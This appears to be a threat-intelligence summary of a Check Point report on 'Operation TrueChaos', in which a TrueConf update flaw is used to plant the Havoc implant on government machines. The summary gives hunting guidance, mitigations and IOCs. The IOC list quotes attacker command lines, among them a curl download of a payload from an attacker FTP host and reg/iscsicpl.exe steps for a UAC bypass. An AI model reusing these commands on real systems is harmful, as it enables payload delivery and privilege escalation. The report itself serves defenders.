Skip to content
.ca
sign in
5 mincritical

Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets

Check Point Research discovered a zero-day vulnerability (CVE-2026-3502) in the TrueConf client update mechanism, exploited in 'Operation TrueChaos' against Southeast Asian governments. Attackers compromised on-premises TrueConf servers to distribute malicious updates, utilizing DLL sideloading and UAC bypass techniques to deploy the Havoc C2 framework.

Sens:ImmediateConf:highAnalyzed:2026-03-31reports

Authors: Check Point Research

ActorsOperation TrueChaosChinese-nexus threat actorAmaranth DragonShadowPad
CVE-2026-3502DLL SideloadingTrueConfHavocUAC Bypass

Source:Check Point

IOCs · 3

Key Takeaways

  • A zero-day vulnerability (CVE-2026-3502) in the TrueConf client update mechanism was exploited in the wild.
  • Attackers compromised on-premises TrueConf servers to distribute malicious updates to connected government clients.
  • The campaign, dubbed 'Operation TrueChaos', targeted Southeast Asian government entities.
  • The infection chain utilizes DLL sideloading (via poweriso.exe) and UAC bypass (via iscsicpl.exe) to deploy the Havoc C2 framework.
  • Attribution points to a Chinese-nexus threat actor with moderate confidence, potentially overlapping with ShadowPad operators.

Affected Systems

  • TrueConf Windows client versions prior to 8.5.3
  • Windows OS

Vulnerabilities (CVEs)

  • CVE-2026-3502 (CVSS 7.8) - TrueConf updater validation mechanism flaw

Attack Chain

The attacker compromises an on-premises TrueConf server and replaces the legitimate update package with a malicious Inno Setup installer. When clients update, the installer drops a benign poweriso.exe and a malicious 7z-x64.dll, executing the DLL via sideloading. The attacker then performs reconnaissance, downloads an additional archive via FTP, and modifies the user's PATH variable to execute iscsicpl.exe for a UAC bypass via DLL search-order hijacking with iscsiexe.dll. Finally, the loader maintains persistence for the Havoc C2 implant.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article provides behavioral hunting recommendations and IOCs but does not include ready-to-use detection rules.

Detection Engineering Assessment

EDR Visibility: High — The attack relies heavily on process creation (cmd.exe, curl, winrar), DLL sideloading, and registry modifications (Run keys, Environment PATH), which are highly visible in EDR telemetry. Network Visibility: Medium — C2 traffic to Havoc servers and FTP downloads are visible, but the initial distribution happens over the trusted internal TrueConf update channel. Detection Difficulty: Moderate — While the initial vector blends in with legitimate updates, the post-exploitation activity (DLL sideloading, UAC bypass via iscsicpl.exe, and suspicious child processes) provides strong behavioral signals.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon 1)
  • Registry Events (Sysmon 12, 13, 14)
  • File Creation (Sysmon 11)
  • Network Connections (Sysmon 3)

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Look for trueconf_windows_update.tmp spawning suspicious child processes or dropping known sideloading binaries like poweriso.exe.Process Creation, File CreationExecutionLow
Identify instances of poweriso.exe spawning cmd.exe with network or archiving tools like curl, winrar, or netstat.Process CreationDiscoveryLow
Monitor for modifications to the HKCU\Environment PATH variable followed by the execution of iscsicpl.exe.Registry Modification, Process CreationPrivilege EscalationLow
Hunt for unsigned trueconf_windows_update.exe binaries executing in the environment.Process Creation, File CreationExecutionLow

Control Gaps

  • Lack of integrity and authenticity checks in TrueConf's update mechanism.

Key Behavioral Indicators

  • Unsigned trueconf_windows_update.exe
  • poweriso.exe in C:\ProgramData\PowerISO\
  • iscsicpl.exe execution after PATH modification
  • Suspicious parent-child process chain: trueconf.exe -> trueconf_windows_update.exe -> trueconf_windows_update.tmp

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Update TrueConf Windows client to version 8.5.3 or later.
  • Search endpoints for the presence of poweriso.exe in C:\ProgramData\PowerISO\ and the specified Havoc C2 IPs.

Infrastructure Hardening

  • Implement strict access controls and monitoring on on-premises TrueConf servers.
  • Restrict outbound FTP and unnecessary C2 ports from internal endpoints.

User Protection

  • Deploy EDR rules to detect DLL sideloading and UAC bypass techniques (e.g., iscsicpl.exe abuse).

Security Awareness

  • Educate IT and security teams on the risks of supply chain and internal update mechanism abuse.

MITRE ATT&CK Mapping

  • T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
  • T1574.002 - Hijack Execution Flow: DLL Side-Loading
  • T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking
  • T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
  • T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1059.003 - Command and Scripting Interpreter: Windows Command Shell

Additional IOCs

  • Urls:
    • fxp://47[.]237[.]15[[.]]197/update[.]7z - FTP URL used to download the secondary payload archive
  • Registry Keys:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck - Persistence mechanism pointing to C:\ProgramData\PowerISO\PowerISO.exe
    • HKCU\Environment - Registry key modified to alter the PATH variable for UAC bypass
  • File Paths:
    • C:\ProgramData\PowerISO\poweriso.exe - Legitimate binary abused for DLL sideloading
    • C:\ProgramData\PowerISO\7z-x64.dll - Malicious DLL sideloaded by poweriso.exe
    • %AppData%\Roaming\Adobe\update.7z - Downloaded archive containing secondary payloads
    • C:\ProgramData\winexec.exe - Renamed poweriso.exe executed by the loader for persistence
  • Command Lines:
    • Purpose: Reconnaissance of running processes | Tools: tasklist | Stage: Discovery | tasklist > cache
    • Purpose: Network reconnaissance | Tools: tracert | Stage: Discovery | tracert 8.8.8.8 -h 5
    • Purpose: Download secondary payload via FTP | Tools: curl | Stage: Execution | curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o
    • Purpose: Extract downloaded archive | Tools: winrar.exe | Stage: Execution | c:\program files\winrar\winrar.exe x update.7z -p
    • Purpose: Modify PATH environment variable for UAC bypass | Tools: reg.exe | Stage: Privilege Escalation | reg add "hkcu\environment" /v path /t REG_SZ /d
    • Purpose: Execute UAC bypass via DLL search-order hijacking | Tools: cmd.exe, iscsicpl.exe | Stage: Privilege Escalation | c:\windows\system32\cmd.exe c:\windows\syswow64\iscsicpl.exe
  • Other:
    • rom.dat - Encrypted 7z archive of unknown purpose
    • 7za.exe - Legitimate archiving tool dropped during the attack

Related